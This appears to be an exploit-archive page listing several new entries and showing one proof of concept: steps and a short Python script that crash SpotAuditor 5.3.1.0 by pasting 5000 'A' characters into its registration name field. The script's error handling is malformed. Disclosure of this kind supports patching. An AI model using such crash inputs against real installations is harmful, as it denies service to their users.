7c5ad20e72
6 changes to exploits/shellcodes SpotAuditor 5.3.1.0 - Denial of Service ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Uplay 92.0.0.6280 - Local Privilege Escalation Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting Ajenti 2.1.31 - Remote Code Execution Kirona-DRS 5.5.3.5 - Information Disclosure
32 lines
No EOL
763 B
Python
Executable file
32 lines
No EOL
763 B
Python
Executable file
# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
|
|
# Author: Sanjana Shetty
|
|
# Date: 2019-10-13
|
|
# Version: SpotAuditor 5.3.1.0
|
|
# Vendor Homepage: http://www.nsauditor.com
|
|
# Software link: http://spotauditor.nsauditor.com/
|
|
|
|
|
|
# <POC by Sanjana Shetty>
|
|
# Steps
|
|
|
|
[1] Install the SpotAuditor software
|
|
|
|
[2] Access the register functionality
|
|
|
|
[3] In the name field enter 5000 A's and press enter, this will crash the
|
|
application.
|
|
|
|
==== use below script to create 5000 A's to a text file and copy it to the name field============
|
|
|
|
|
|
print ("# POC by sanjana shetty")
|
|
|
|
try:
|
|
f = open("file.txt","w")
|
|
junk = "\x41" * 5000
|
|
f.write(junk)
|
|
print ("done")
|
|
|
|
except (Exception, e):
|
|
|
|
print ("#error - ") + str(e) |